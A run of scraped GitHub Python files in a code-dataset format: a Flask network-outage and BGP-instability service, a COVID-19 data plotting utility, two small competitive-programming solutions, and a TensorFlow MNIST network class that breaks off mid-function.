\"RS\",\n \"seychelles\": \"SC\",\n \"sierra leone\": \"SL\",\n \"singapore\": \"SG\",\n \"slovakia\": \"SK\",\n \"slovenia\": \"SI\",\n \"solomon islands\": \"SB\",\n \"somalia\": \"SO\",\n \"south africa\": \"ZA\",\n \"south georgia and the south sandwich islands\": \"GS\",\n \"spain\": \"ES\",\n \"sri lanka\": \"LK\",\n \"sudan\": \"SD\",\n \"s\": \"SR\",\n \"svalbard and jan mayen\": \"SJ\",\n \"swaziland\": \"SZ\",\n \"sweden\": \"SE\",\n \"switzerland\": \"CH\",\n \"syrian arab republic\": \"SY\",\n \"taiwan, province of china\": \"TW\",\n \"tajikistan\": \"TJ\",\n \"tanzania, united republic of\": \"TZ\",\n \"thailand\": \"TH\",\n \"timor-leste\": \"TL\",\n \"togo\": \"TG\",\n \"tokelau\": \"TK\",\n \"tonga\": \"TO\",\n \"trinidad and tobago\": \"TT\",\n \"tunisia\": \"TN\",\n \"turkey\": \"TR\",\n \"turkmenistan\": \"TM\",\n \"turks and caicos islands\": \"TC\",\n \"tuvalu\": \"TV\",\n \"uganda\": \"UG\",\n \"ukraine\": \"UA\",\n \"united arab emirates\": \"AE\",\n \"united kingdom\": \"GB\",\n \"united states\": \"US\",\n \"united states minor outlying islands\": \"UM\",\n \"uruguay\": \"UY\",\n \"uzbekistan\": \"UZ\",\n \"vanuatu\": \"VU\",\n \"venezuela\": \"VE\",\n \"viet nam\": \"VN\",\n \"virgin islands, british\": \"VG\",\n \"virgin islands, U.S.\": \"VI\",\n \"wallis and futuna\": \"WF\",\n \"western sahara\": \"EH\",\n \"yemen\": \"YE\",\n \"zambia\": \"ZM\",\n \"zimbabwe\": \"ZW\"\n }\n return country_names\n\n# @app.route(\"/alert\")\n# def alert():\n# dict = {}\n\n# curr_date = datetime.datetime.now()\n\n# timestamp = str(int(round(curr_date.timestamp())))\n\n\n# url = 'https://ioda.caida.org/ioda/data/alerts?from='+timestamp + \\\n# '&until='+timestamp+'&annotateMeta=true&human=true&meta=asn/3307'\n# alerts = requests.get(url).json()\n\n# start_time = alerts[\"queryParameters\"][\"from\"]\n# end_time = alerts[\"queryParameters\"][\"until\"]\n\n# timestamp1 = datetime.datetime.fromtimestamp(int(start_time))\n# start = timestamp1.strftime('%Y-%m-%d %H:%M:%S')\n\n# timestamp2 = datetime.datetime.fromtimestamp(int(end_time))\n# end = timestamp2.strftime('%Y-%m-%d %H:%M:%S')\n\n\n# list_alerts = alerts[\"data\"][\"alerts\"]\n\n# dict[\"Alerts\"] = list_alerts\n\n\n# dict[\"Start-time\"] = start\n\n\n# dict[\"End-time\"] = end\n\n# s=\"\"\n\n# if not list_alerts:\n# s=\"No Outages are expected\"\n# return s\n# else:\n# return list_alerts\n\n@ app.route(\"/message\")\ndef message():\n adrr = get_tasks()\n adr = adrr['ip']\n\n sourceip = \"https://stat.ripe.net/data/whois/data.json?resource=\"+adr+\"%2F24\"\n responseip = requests.get(sourceip).json()\n a = responseip[\"data\"][\"irr_records\"][0][2][\"value\"]\n b = responseip[\"data\"][\"irr_records\"][0][1][\"value\"]\n if (any(c.isalpha() for c in a) == False):\n asn = a\n if (any(c.isalpha() for c in b) == False):\n asn = b\n dict = {}\n mssg = {}\n previous_date = datetime.datetime.today() - datetime.timedelta(days=1)\n times = str(int(round(previous_date.timestamp())))\n\n curr_date = datetime.datetime.now()\n times1 = str(int(round(curr_date.timestamp())))\n\n url = 'https://ioda.caida.org/ioda/data/events?from=' + \\\n times+'&until='+times1+'&human=true&meta=asn/'+asn\n events = requests.get(url).json()\n\n start_time = events[\"queryParameters\"][\"from\"]\n end_time = events[\"queryParameters\"][\"until\"]\n\n timestamp1 = datetime.datetime.fromtimestamp(int(start_time))\n start = timestamp1.strftime('%Y-%m-%d %H:%M:%S')\n\n timestamp2 = datetime.datetime.fromtimestamp(int(end_time))\n end = timestamp2.strftime('%Y-%m-%d %H:%M:%S')\n\n list_events = events[\"data\"][\"events\"]\n\n dict[\"events\"] = list_events\n\n dict[\"Start-time\"] = start\n\n dict[\"End-time\"] = end\n\n s = \"\"\n\n if not list_events:\n s = \"No outages occured while you were away\"\n mssg[\"outages\"] = s\n\n else:\n s = \"An Outage Occured\"\n mssg[\"outages\"] = s\n\n return mssg\n\n@app.route(\"/ml\")\ndef ML():\n adrr = get_tasks()\n adr=adrr['ip']\n #adr='94.187.8.0'\n sourceip = \"https://stat.ripe.net/data/whois/data.json?resource=\"+adr+\"%2F24\"\n responseip = requests.get(sourceip).json()\n a = responseip[\"data\"][\"irr_records\"][0][2][\"value\"]\n b=responseip[\"data\"][\"irr_records\"][0][1][\"value\"]\n if (any(c.isalpha() for c in a)==False):\n asn=a\n if (any(c.isalpha() for c in b)==False):\n asn=b\n url = \"https://stat.ripe.net/data/routing-history/data.json?min_peers=0&resource=\"+asn\n\n pref = responseip[\"data\"][\"records\"][0][0][\"value\"]\n pref=pref[0:(len(pref)-3)]\n url = 'https://stat.ripe.net/data/bgp-update-activity/data.json?endtime=2022-04-15T12%3A00%3A00&hide_empty_samples=false&max_samples=10000&resource='+pref+'&starttime=2021-04-29T00%3A00%3A00'\n r = requests.get(url)\n json = r.json()\n df = pd.DataFrame(json['data']['updates'])\n df.drop(\"starttime\", axis=1, inplace=True)\n r=df.shape[0]-1\n nb=df.iloc[r,0:2].values\n df = df.drop(df.shape[0]-1, axis=0)\n l=[]\n av=df[\"announcements\"].mean()\n l.append(int(df[\"announcements\"][0]>av))\n l.append(int(df[\"announcements\"][1]>av))\n i=2\n while (i<df.shape[0]):\n m=(df[\"announcements\"][i-1]+df[\"announcements\"][i-2])/2\n if (df[\"announcements\"][i]<m):\n l.append(0)\n else:\n l.append(1)\n i=i+1\n df[\"label\"]=l\n\n\n training_set, test_set = train_test_split(df, test_size = 0.2) \n\n X_train = training_set.iloc[:,0:2].values\n Y_train = training_set.iloc[:,2].values\n\n\n classifier = SVC(kernel='rbf', random_state = 1,gamma=0.01)\n classifier.fit(X_train,Y_train)\n Y_pred = classifier.predict(nb.reshape(1, -1))\n s=\"\"\n mssg={}\n\n if (Y_pred[0]==1):\n\n s=\"Your network is prone to instability in the upcoming hours!\"\n mssg[\"outages\"]=s\n\n else:\n s=\"Safe:No instability detected!\"\n mssg[\"outages\"]=s\n\n return mssg\n\n# if __name__ == \"__main__\":\n# app.run(debug=True)","repo_name":"ElioBouJaoudeh/FlaskServerIntermeter","sub_path":"ip.py","file_name":"ip.py","file_ext":"py","file_size_in_byte":24845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"28142879535","text":"import logging\nimport matplotlib.dates as mdates\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom pathlib import Path\nimport sys\n\n\n\ndef get_covid_data_jhu(category, region='US'):\n ''' Get COVID-19 data from Johns Hopkins University; return DataFrame.'''\n\n # pd.read_csv() will raise exception if the file name is not valid,\n # this assert statement provides valid tags (as of 2020-05-19)\n p = category in {'confirmed', 'deaths'}\n assert p, print(f'category {category} not recognized')\n \n covid_csv_file = (\n 'https://raw.githubusercontent.com'\n '/CSSEGISandData'\n '/COVID-19'\n '/master'\n '/csse_covid_19_data'\n '/csse_covid_19_time_series'\n f'/time_series_covid19_{category}_{region}.csv'\n )\n t = pd.read_csv(covid_csv_file)\n logging.info('function %s | covid_file = %s', 'get_covid_data_jhu', covid_csv_file)\n logging.info('function %s | category %s | shape %r', 'get_covid_data_jhu', category, t.shape)\n \n return t\n\ndef reshape(df, category):\n ''' Convert dataframe to tidy format.\n \n Input: 1 row for each state+county; 1 column for each date\n \n Output: 1 row for each date (as index, with type datetime64[D]); \n 1 column for each state+county (as multi-index)\n '''\n\n date_idx = df.columns.get_loc('1/22/20')\n\n t = (df.melt(id_vars = ['Province_State', 'Admin2'],\n value_vars = df.columns[date_idx : ],\n var_name = 'date',\n value_name = category,\n )\n .assign(date = lambda x: pd.to_datetime(x['date'], \n format='%m/%d/%y', \n errors='coerce'))\n .set_index(['date', 'Province_State', 'Admin2'], \n verify_integrity=True)\n .sort_index()\n .squeeze()\n .unstack(level=['Province_State', 'Admin2'])\n )\n \n # we use `.sort_index()` so don't need these `assert` statements\n assert t.index.is_monotonic_increasing\n assert t.columns.is_monotonic_increasing\n logging.info('function %s | category %s | shape %r', 'reshape', category, t.shape)\n \n return t\n\ndef extract_population(df):\n \n ''' Extract US population data from the `deaths` dataframe.\n \n Input: dataframe with US deaths (and population!)\n Output: pandas series with population (multi-index by State, County)\n '''\n \n t = (df\n .filter(['Province_State', 'Admin2', 'Population'])\n .set_index(['Province_State', 'Admin2'], verify_integrity=True)\n .sort_index()\n .squeeze()\n )\n \n logging.info('function %s | shape %r', 'extract_population', t.shape)\n logging.info('status : done extracting population')\n\n return t\n\nclass Error(Exception):\n ''' Base class for exceptions in this module.'''\n pass\n\nclass DataValidationError(Error):\n def __init__(self, message):\n self.message = message\n\n\ndef initial_validation(dfs, pop, categories):\n\n # validation\n \n p = set(dfs.keys()) == set(categories)\n if not p:\n raise DataValidationError('dict keys != categories')\n\n p = (dfs['confirmed'].index == dfs['deaths'].index).all()\n if not p:\n raise DataValidationError('confirmed index != deaths index')\n \n p = (dfs['confirmed'].columns == dfs['deaths'].columns).all()\n if not p:\n raise DataValidationError('confirmed columns != deaths columns')\n\n p = (dfs['confirmed'].columns == pop.index).all()\n if not p:\n raise DataValidationError('confirmed columns != population index')\n\n logging.info('function %s | status : all initial data consistency checks passed', \n 'initial_validation')\n \n return True\n\n\ndef latest_date_state_level(dfs, pop):\n ''' Create summary table for latest available date.'''\n \n # population: create state-level summary (not state + county)\n state_pop = pop.sum(level='Province_State')\n\n # covid confirmed cases + deaths (latest available date)\n ts = list()\n for category in dfs.keys():\n cases = dfs[category].iloc[-1].sum(level='Province_State').rename(category)\n ts.append(cases)\n \n per_100k = cases.div(state_pop).mul(100_000).rename(category + ' per 100k')\n ts.append(per_100k)\n\n ts.append(state_pop)\n \n # several pandas series => one dataframe\n frame = pd.concat(ts, axis=1)\n\n frame['as_of_date'] = dfs[category].index.max()\n\n # exclude the two cruise ships\n mask = frame.index.isin({'Diamond Princess', 'Grand Princess'})\n frame = frame[~ mask]\n\n return frame\n\n\n\nstate_name_to_code = {\n 'California': 'CA',\n 'Connecticut': 'CT',\n 'Florida': 'FL',\n 'Illinois': 'IL',\n 'Louisiana': 'LA',\n 'Maryland': 'MA',\n 'Massachusetts': 'MA',\n 'Michigan': 'MI',\n 'New Jersey': 'NJ',\n 'New York': 'NY',\n 'Pennsylvania': 'PA',\n 'Texas': 'TX',\n}\n\n\n\ndef plot_count_vs_rate(data, category):\n fig, ax = plt.subplots(figsize=(10, 6))\n\n as_of = data['as_of_date'].iloc[0].strftime('%Y-%m-%d')\n x = category\n y = f'{category} per 100k'\n \n ax.scatter(data[x].values, data[y].values, alpha=0.5)\n\n ax.set(xlabel = x.title(),\n ylabel = y.title(),\n title = f'Number of {x.title()} vs. Number of {y.title()} as of {as_of}',\n )\n \n # add annotation for top 10 items\n for state in data[x].sort_values(ascending=False).index[0:10]:\n state_x = data.at[state, x]\n state_y = data.at[state, y]\n\n ax.annotate(state_name_to_code.get(state, state),\n xy=(state_x, state_y),\n xycoords='data',\n xytext=(5, 0),\n textcoords='offset points',\n #arrowprops=dict(facecolor='black', shrink=0.05),\n horizontalalignment='left',\n verticalalignment='center')\n\n return fig, ax\n\n\ndef plot_confirmed_vs_deaths(data):\n\n fig, ax = plt.subplots(figsize=(10, 6))\n \n as_of = data['as_of_date'].iloc[0].strftime('%Y-%m-%d')\n\n mask = data['deaths'] >= 10\n\n ax.scatter(data.loc[mask, 'confirmed'].values,\n data.loc[mask, 'deaths'].values,\n alpha=0.5)\n\n ax.set(xlabel='Number of Confirmed Cases',\n ylabel='Number of Deaths',\n xscale='log',\n yscale='log',\n title=f'Number of Confirmed Cases vs Number of Deaths as of {as_of}',\n )\n\n ax.annotate('for states reporting\\n10 or more deaths',\n xy=(1, 0),\n xycoords='axes fraction',\n xytext=(-20, 20),\n textcoords='offset pixels',\n horizontalalignment='right',\n verticalalignment='bottom',\n )\n \n # add annotation for top 10 items\n x = 'confirmed'\n y = 'deaths'\n \n for state in data[y].sort_values(ascending=False).index[0:10]:\n state_x = data.at[state, x]\n state_y = data.at[state, y]\n\n ax.annotate(state_name_to_code.get(state, state),\n xy=(state_x, state_y),\n xycoords='data',\n xytext=(5, 0),\n textcoords='offset points',\n #arrowprops=dict(facecolor='black', shrink=0.05),\n horizontalalignment='left',\n verticalalignment='center')\n\n \n return fig, ax\n\n\ndef plot_observations_vs_date(data, category):\n\n fig, ax = plt.subplots(figsize=(10, 6))\n\n top_10_states = (data[category]\n .sum(axis=1, level='Province_State')\n .iloc[-1]\n .sort_values(ascending=False)\n .index[0:10]\n )\n\n for state in top_10_states:\n t = data[category].sum(axis=1, level='Province_State').loc[:, state].loc[lambda x: x >= 10]\n ax.plot(t, label=state)\n\n ax.set(xlabel='Date',\n ylabel=f'Number of {category.title()}',\n yscale='log',\n title=f'Number of {category.title()}'\n )\n ax.get_xaxis().set_major_locator(mdates.DayLocator(interval=14))\n ax.get_xaxis().set_major_formatter(mdates.DateFormatter('%b %d'))\n\n ax.legend()\n\n return fig, ax\n\ndef plot_observations_vs_days(data, category):\n\n fig, ax = plt.subplots(figsize=(10, 6))\n\n top_10_states = (data[category]\n .sum(axis=1, level='Province_State')\n .iloc[-1]\n .sort_values(ascending=False)\n .index[0:10]\n )\n\n for state in top_10_states:\n t = (data[category]\n .sum(axis=1, level='Province_State')\n .loc[:, state]\n .loc[lambda x: x >= 10]\n .reset_index(drop=True)\n )\n ax.plot(t, label=state)\n\n ax.set(xlabel=f'Days since 10th {category.title()}',\n ylabel=f'Number of {category.title()}',\n yscale='log',\n title=f'Number of {category.title()}'\n )\n\n ax.legend()\n\n return fig, ax\n\n# counties in Southern California (So Cal)\nso_cal_counties = [\n 'Imperial',\n 'Kern',\n 'Los Angeles',\n 'Orange',\n 'Riverside',\n 'San Bernardino',\n 'San Diego',\n 'San Luis Obispo',\n 'Santa Barbara',\n 'Ventura',\n ]\n\ndef drop_level_inline(df):\n t = df.copy()\n t.columns = t.columns.droplevel(0)\n return t\n\ndef confirmed_cases_so_cal(data, category):\n fig, ax = plt.subplots(figsize=(10, 6))\n\n t = (data[category]\n .loc[:, ('California', so_cal_counties)]\n .pipe(drop_level_inline)\n )\n\n for county in t.columns:\n ax.plot(t[county].loc[lambda x: x >= 10], label=county)\n\n ax.set(xlabel='date',\n ylabel='# of Confirmed Cases',\n yscale='log',\n title='Confirmed Cases in Southern California',\n )\n\n ax.get_xaxis().set_major_locator(mdates.DayLocator(interval=14))\n ax.get_xaxis().set_major_formatter(mdates.DateFormatter('%b %d'))\n\n ax.legend()\n \n return fig, ax\n","repo_name":"jeffrey-smart/covid-19","sub_path":"src/covid_util.py","file_name":"covid_util.py","file_ext":"py","file_size_in_byte":10117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"28666138428","text":"a,b,c = map(int, input().split())\n\nif b >= c:\n print(-1)\n exit()\n\nn = (a // (c -b)) + 1\nprint(n) \n\n\n# 손익분기점\n# 고정비용 A만원\n# 노트북 1대 생산 가변비용 B만원\n# 노트북 가격 C만원\n\n# 총 비용 = A + (B * n)\n# 이익 = C * n\n\n# https://www.acmicpc.net/problem/1712","repo_name":"Gajeju/Coding_test_Programming","sub_path":"bkackjoon/step/08_math_1/P01_1712.py","file_name":"P01_1712.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"30691845521","text":"import sys\ninput = sys.stdin.readline\nfrom collections import deque\n\nt = int(input())\nfor c in range(t) : \n start, end = map(int, input().split())\n isVisit = [False] * 10000\n isVisit[start] = True\n path = [\"\"] * 10000\n q = deque()\n q.append(start)\n\n while q : \n tmp = q.popleft()\n\n # D *2\n op = (tmp*2) % 10000\n if not isVisit[op] :\n q.append(op)\n path[op] = path[tmp] + 'D'\n isVisit[op] = True\n\n # S -1\n op = (tmp-1) % 10000\n if not isVisit[op] :\n q.append(op)\n path[op] += path[tmp] + 'S'\n isVisit[op] = True\n\n # L <1\n op = (tmp % 1000) * 10 + tmp // 1000\n\n if not isVisit[op] :\n q.append(op)\n path[op] += path[tmp] + 'L'\n isVisit[op] = True\n \n # R >1\n op = (tmp % 10) * 1000 + tmp // 10\n\n if not isVisit[op] :\n q.append(op)\n path[op] += path[tmp] + 'R'\n isVisit[op] = True\n\n print(path[end])","repo_name":"SuperH0ng/algorithm","sub_path":"따로 푼 것/백준/백준 9019번(DSLR).py","file_name":"백준 9019번(DSLR).py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"13401717381","text":"import matplotlib.pyplot as plt\nimport tensorflow as tf\nimport numpy as np\nfrom sklearn.metrics import confusion_matrix\nimport time\nfrom datetime import timedelta\nimport math\nimport scipy.ndimage\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nclass network(object):\n def __init__(self):\n tf.reset_default_graph()\n self.test_batch_size = 256\n self.train_batch_size = 64\n self.total_iterations = 0\n\n def setup(self,load = None, structure=None,end_relu = False,end_biases = False, data = None, offset = 0, scale = 1):\n \"\"\"\n Creates a network\n load: the filepath of the network to load (must be compatible with \"structure\"), if none then a new network will be created\n structure: an array determining the type of network and the hidden structure of the network. The array has the shape:\n [size of filters/number of nodes, number of filters/MLP, use pooling/use_relu, use biases];\n If the second input is <=0 then the network will be a MPL, else it will be a ConvNet.\n the last two inputs get converted to boolean from 1 or 0; they determine if the layer has biases and pooling/ReLUs on the layer. (convnets always use ReLUs). There is a fully connected layer added by default at the end of the network, this should not be in the structure array.\n end_relu: determines if the final layer has a ReLU;\n end_biases: determines if the final layer has biases;\n data: none defaults to the MNIST dataset from the Tensorflow examples folder, but others can be used (supplying the MNIST dataset is quicker if it is already loaded);\n offset: puts an offset on all images coming into the network e.g -0.5 will make all MNIST images between -0.5 and 0.5 instead of 0 to 1\n scale: scales the input image by any value, applies before offset\n \n \"\"\"\n self.scale = scale\n self.offset = offset\n self.structure = structure\n self.data = data\n if (self.data is None):\n self.data = input_data.read_data_sets('data/MNIST/', one_hot=True)\n\n # We know that MNIST images are 28 pixels in each dimension.\n self.img_size = 28\n # Images are stored in one-dimensional arrays of this length.\n self.img_size_flat = self.img_size * self.img_size\n # Tuple with height and width of images used to reshape arrays.\n self.img_shape = (self.img_size, self.img_size)\n # Number of colour channels for the images: 1 channel for gray-scale.\n self.num_channels = 1\n # Number of classes, one class for each of 10 digits.\n self.num_classes = 10\n\n self.x = tf.placeholder(tf.float32, shape=[None, self.img_size_flat], name='x')\n self.scale_layer = tf.multiply(self.x,self.scale)\n self.offset_layer = tf.add(self.scale_layer,self.offset)\n self.x_image = tf.reshape(self.offset_layer, [-1, self.img_size, self.img_size, self.num_channels])\n self.y_true = tf.placeholder(tf.float32, shape=[None, self.num_classes], name='y_true')\n self.y_true_cls = tf.argmax(self.y_true, axis=1)\n\n self.layers = [tf.Tensor for i in range(self.structure.shape[0]+1)]\n self.weights = [tf.Variable for i in range(self.structure.shape[0]+1)]\n self.biases = [tf.Variable for i in range(self.structure.shape[0]+1)]\n\n i=0;\n while (i<self.structure.shape[0]):\n self.filter_size = self.structure[i,0]\n self.num_filters = self.structure[i,1]\n self.use_pooling = bool(self.structure[i,2])\n self.use_biases = bool(self.structure[i,3])\n if (self.num_filters>0):\n if (i==0):\n self.layers[i],self.weights[i],self.biases[i] =\\\n self.new_conv_layer(input=self.x_image,\n num_input_channels=self.num_channels,\n filter_size=self.filter_size,\n num_filters=self.num_filters,\n use_pooling=self.use_pooling,\n use_biases =self.use_biases)\n else:\n self.num_input_channels = self.structure[i-1,1]\n self.layers[i],self.weights[i],self.biases[i] =\\\n self.new_conv_layer(input=self.layers[i-1],\n num_input_channels=self.num_input_channels,\n filter_size=self.filter_size,\n num_filters=self.num_filters,\n use_pooling=self.use_pooling,\n use_biases =self.use_biases)\n i=i+1\n\n else:\n if (i==0):\n self.layer_flat, self.num_features = self.flatten_layer(self.x_image)\n self.layers[i],self.weights[i],self.biases[i] = self.new_fc_layer(input=self.layer_flat,\n num_inputs=self.num_features,\n num_outputs=self.filter_size,\n use_relu=self.use_pooling,\n use_biases =self.use_biases)\n else:\n if(self.structure[i-1,1]>0):\n self.image_flat, self.num_pixels = self.flatten_layer(self.layers[i-1])\n self.layers[i],self.weights[i],self.biases[i] = self.new_fc_layer(input=self.image_flat,\n num_inputs=self.num_pixels,\n num_outputs=self.filter_size,\n use_relu=self.use_pooling,\n use_biases =self.use_biases)\n\n else:\n self.layers[i],self.weights[i],self.biases[i] = self.new_fc_layer(input=self.layers[i-1],\n num_inputs=self.num_features,\n num_outputs=self.filter_size,\n use_relu=self.use_pooling,\n use_biases =self.use_biases)\n self.num_features = self.filter_size\n i=i+1\n\n if(self.structure[i-1,1]>0):\n self.layer_last,self.num_features = self.flatten_layer(self.layers[i-1])\n else:\n self.layer_last = self.layers[i-1]\n\n self.layers[i],self.weights[i],self.biases[i]= self.new_fc_layer(input=self.layer_last,\n num_inputs=self.num_features,\n num_outputs=self.num_classes,\n use_relu=end_relu,\n use_biases = end_biases)\n\n self.y_pred = tf.nn.softmax(self.layers[i])\n\n self.y_pred_cls = tf.argmax(self.y_pred, axis=1)\n\n self.cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits=self.layers[i],\n labels=self.y_true)\n self.cost = tf.reduce_mean(self.cross_entropy)\n self.optimizer = tf.train.AdamOptimizer(learning_rate=1e-4).minimize(self.cost)\n self.correct_prediction = tf.equal(self.y_pred_cls, self.y_true_cls)\n self.accuracy = tf.reduce_mean(tf.cast(self.correct_prediction, tf.float32))\n\n self.session = tf.Session()\n self.session.run(tf.global_variables_initializer())\n\n if (load is not None):\n if load==\"default\":\n load =\"./Models/MNIST_model\"\n self.session = tf.Session()\n self.saver = tf.train.Saver()\n self.saver.restore(self.session,load)\n\n def save(self,location = \"./Models/MNIST_model\"):\n \"\"\"\n saves the network at the given file path, defaults to \"./Models/MNIST_model\".\n \"\"\"\n self.saver = tf.train.Saver()\n self.saver.save(self.session, location)\n\n def plot_images(self,images, cls_true, cls_pred=None):\n \"\"\"\n plots 9 supplied images in a 3x3 grid, together with the true and predicted class labels. \n \"\"\"\n assert len(images) == len(cls_true) == 9\n\n # Create figure with 3x3 sub-plots.\n fig, axes = plt.subplots(3, 3)\n fig.subplots_adjust(hspace=0.3, wspace=0.3)\n\n for i, ax in enumerate(axes.flat):\n # Plot image.\n ax.imshow(images[i].reshape(self.img_shape), cmap='binary')\n\n # Show true and predicted classes.\n if self.cls_pred is None:\n xlabel = \"True: {0}\".format(self.cls_true[i])\n else:\n xlabel = \"True: {0}, Pred: {1}\".format(self.cls_true[i], self.cls_pred[i])\n\n # Show the classes as the label on the x-axis.\n ax.set_xlabel(xlabel)\n\n # Remove ticks from the plot.\n ax.set_xticks([])\n ax.set_yticks([])\n\n # Ensure the plot is shown correctly with multiple plots\n # in a single Notebook cell.\n plt.show()\n\n def new_weights(self,shape):\n return tf.Variable(tf.truncated_normal(shape, stddev=0.05))\n\n def new_biases(self,length):\n return tf.Variable(tf.constant(0.05, shape=[length]))\n\n def new_conv_layer(self,\n input, # The previous layer.\n num_input_channels, # Num. channels in prev. layer.\n filter_size, # Width and height of each filter.\n num_filters, # Number of filters.\n use_pooling=True,\n use_biases =True\n ):\n\n # Shape of the filter-weights for the convolution.\n # This format is determined by the TensorFlow API.\n shape = [filter_size, filter_size, num_input_channels, num_filters]\n\n # Create new weights aka. filters with the given shape.\n weights = self.new_weights(shape=shape)\n\n if(use_biases):\n # Create new biases, one for each filter.\n biases = self.new_biases(length=num_filters)\n else:\n biases = []\n\n # Create the TensorFlow operation for convolution.\n # Note the strides are set to 1 in all dimensions.\n # The first and last stride must always be 1,\n # because the first is for the image-number and\n # the last is for the input-channel.\n # But e.g. strides=[1, 2, 2, 1] would mean that the filter\n # is moved 2 pixels across the x- and y-axis of the image.\n # The padding is set to 'SAME' which means the input image\n # is padded with zeroes so the size of the output is the same.\n layer = tf.nn.conv2d(input=input,\n filter=weights,\n strides=[1, 1, 1, 1],\n padding='SAME')\n\n # Add the biases to the results of the convolution.\n # A bias-value is added to each filter-channel.\n if(use_biases):\n layer += biases\n\n # Use pooling to down-sample the image resolution?\n if use_pooling:\n # This is 2x2 max-pooling, which means that we\n # consider 2x2 windows and select the largest value\n # in each window. Then we move 2 pixels to the next window.\n layer = tf.nn.max_pool(value=layer,\n ksize=[1, 2, 2, 1],\n strides=[1, 2, 2, 1],\n padding='SAME')\n\n # Rectified Linear Unit (ReLU).\n # It calculates max(x, 0) for each input pixel x.\n # This adds some non-linearity to the formula and allows us\n # to learn more complicated functions.\n layer = tf.nn.relu(layer)\n\n # Note that ReLU is normally executed before the pooling,\n # but since relu(max_pool(x)) == max_pool(relu(x)) we can\n # save 75% of the relu-operations by max-pooling first.\n\n # We return both the resulting layer and the filter-weights\n # because we will plot the weights later.\n return layer, weights, biases\n\n def flatten_layer(self,layer):\n # Get the shape of the input layer.\n layer_shape = layer.get_shape()\n\n # The shape of the input layer is assumed to be:\n # layer_shape == [num_images, img_height, img_width, num_channels]\n\n # The number of features is: img_height * img_width * num_channels\n # We can use a function from TensorFlow to calculate this.\n num_features = layer_shape[1:4].num_elements()\n\n # Reshape the layer to [num_images, num_features].\n # Note that we just set the size of the second dimension\n # to num_features and the size of the first dimension to -1\n # which means the size in that dimension is calculated\n # so the total size of the tensor is unchanged from the reshaping.\n layer_flat = tf.reshape(layer, [-1, num_features])\n\n # The shape of the flattened layer is now:\n # [num_images, img_height * img_width * num_channels]\n\n # Return both the flattened layer and the number of features.\n return layer_flat, num_features\n\n def new_fc_layer(self,input, # The previous layer.\n num_inputs, # Num. inputs from prev. layer.\n num_outputs, # Num. outputs.\n use_relu=True,\n use_biases = True): # Use Rectified Linear Unit (ReLU)?\n\n # Create new weights and biases.\n weights = self.new_weights(shape=[num_inputs, num_outputs])\n if (use_biases):\n biases = self.new_biases(length=num_outputs)\n else:\n biases =[]\n # Calculate the layer as the matrix multiplication of\n # the input and weights, and then add the bias-values.\n if (use_biases):\n layer = tf.matmul(input, weights) + biases\n else:\n layer = tf.matmul(input, weights)\n # Use ReLU?\n if use_relu:\n layer = tf.nn.relu(layer)\n\n return layer,weights,biases\n\n def optimize(self,num_iterations):\n\n # Start-time used for printing time-usage below.\n start_time = time.time()\n\n for i in range(self.total_iterations,\n self.total_iterations + num_iterations):\n\n # Get a batch of training examples.\n # x_batch now holds a batch of images and\n # y_true_batch are the true labels for those images.\n x_batch, y_true_batch = self.data.train.next_batch(self.train_batch_size)\n\n # Put the batch into a dict with the proper names\n # for placeholder variables in the TensorFlow graph.\n feed_dict_train = {self.x: x_batch,\n self.y_true: y_true_batch}\n\n # Run the optimizer using this batch of training data.\n # TensorFlow assigns the variables in feed_dict_train\n # to the placeholder variables and then runs the optimizer.\n self.session.run(self.optimizer, feed_dict=feed_dict_train)\n\n # Print status every 100 iterations.\n if i % 100 == 0:\n # Calculate the accuracy on the training-set.\n acc = self.session.run(self.accuracy, feed_dict=feed_dict_train)\n\n # Message for printing.\n msg = \"Optimization Iteration: {0:>6}, Training Accuracy: {1:>6.1%}\"\n\n # Print it.\n print(msg.format(i + 1, acc))\n\n # Update the total number of iterations performed.\n self.total_iterations += num_iterations\n\n # Ending time.\n end_time = time.time()\n\n # Difference between start and end-times.\n time_dif = end_time - start_time\n\n # Print the time-usage.\n print(\"Time usage: \" + str(timedelta(seconds=int(round(time_dif)))))\n\n def plot_example_errors(self,cls_pred, correct):\n # This function is called from print_test_accuracy() below.\n\n # cls_pred is an array of the predicted class-number for\n # all images in the test-set.\n\n # correct is a boolean array whether the predicted class\n # is equal to the true class for each image in the test-set.\n\n # Negate the boolean array.\n incorrect = (correct == False)\n\n # Get the images from the test-set that have been\n # incorrectly classified.\n images = self.data.test.images[incorrect]\n\n # Get the predicted classes for those images.\n cls_pred = cls_pred[incorrect]\n\n # Get the true classes for those images.\n cls_true = self.data.test.cls[incorrect]\n\n # Plot the first 9 images.\n plot_images(images=images[0:9],\n cls_true=cls_true[0:9],\n cls_pred=cls_pred[0:9])\n\n def plot_confusion_matrix(self,cls_pred):\n # This is called from print_test_accuracy() below.\n\n # cls_pred is an array of the predicted class-number for\n # all images in the test-set.\n\n # Get the true classifications for the test-set.\n cls_true = self.data.test.cls\n\n # Get the confusion matrix using sklearn.\n cm = confusion_matrix(y_true=cls_true,\n y_pred=cls_pred)\n\n # Print the confusion matrix as text.\n print(cm)\n\n # Plot the confusion matrix as an image.\n plt.matshow(cm)\n\n # Make various adjustments to the plot.\n plt.colorbar()\n tick_marks = np.arange(self.num_classes)\n plt.xticks(tick_marks, range(self.num_classes))\n plt.yticks(tick_marks, range(self.num_classes))\n plt.xlabel('Predicted')\n plt.ylabel('True')\n\n # Ensure the plot is shown correctly with multiple plots\n # in a single Notebook cell.\n plt.show()\n\n # Split the test-set into smaller batches of this size.\n\n def print_test_accuracy(self,show_example_errors=False,\n show_confusion_matrix=False):\n # Number of images in the test-set.\n num_test = len(self.data.test.images)\n\n # Allocate an array for the predicted classes which\n # will be calculated in batches and filled into this array.\n cls_pred = np.zeros(shape=num_test, dtype=np.int)\n\n # Now calculate the predicted classes for the batches.\n # We will just iterate through all the batches.\n # There might be a more clever and Pythonic way of doing this.\n\n # The starting index for the next batch is denoted i.\n i = 0\n\n while i < num_test:\n # The ending index for the next batch is denoted j.\n j = min(i + 